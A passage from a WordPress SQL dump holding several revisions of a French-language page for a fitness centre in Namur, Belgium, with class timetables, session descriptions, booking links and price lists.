class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:36:41', '2014-08-31 08:36:41', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(492, 3, '2015-09-02 16:57:19', '2015-09-02 16:57:19', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png\"><img class=\"alignnone size-medium wp-image-491\" alt=\"Capture d’écran 2015-09-02 à 18.56.23\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23-300x211.png\" width=\"300\" height=\"211\" /></a>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 16:57:19', '2015-09-02 16:57:19', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(483, 1, '2015-04-21 09:55:06', '2015-04-21 09:55:06', '<h1>Small Group Training:</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 09:55:06', '2015-04-21 09:55:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(456, 1, '2014-08-31 08:43:46', '2014-08-31 08:43:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€<br>30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€<br>30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€<br>1 carte de 10 séances : 90.00€ (valable 6 mois)<br>1 carte de 20 séances : 150.00€ (valable 6 mois)<br>1 carte de 50 séances : 300.00€ (valable 1 an)<br></td>\r\n</tr>\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:43:46', '2014-08-31 08:43:46', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(461, 1, '2014-12-15 19:40:04', '2014-12-15 19:40:04', '', 'LesMills', '', 'inherit', 'open', 'open', '', 'lesmills', '', '', '2014-12-15 19:40:04', '2014-12-15 19:40:04', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(466, 1, '2014-12-15 19:44:19', '2014-12-15 19:44:19', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"100\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:44:19', '2014-12-15 19:44:19', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(457, 1, '2014-08-31 08:47:00', '2014-08-31 08:47:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td 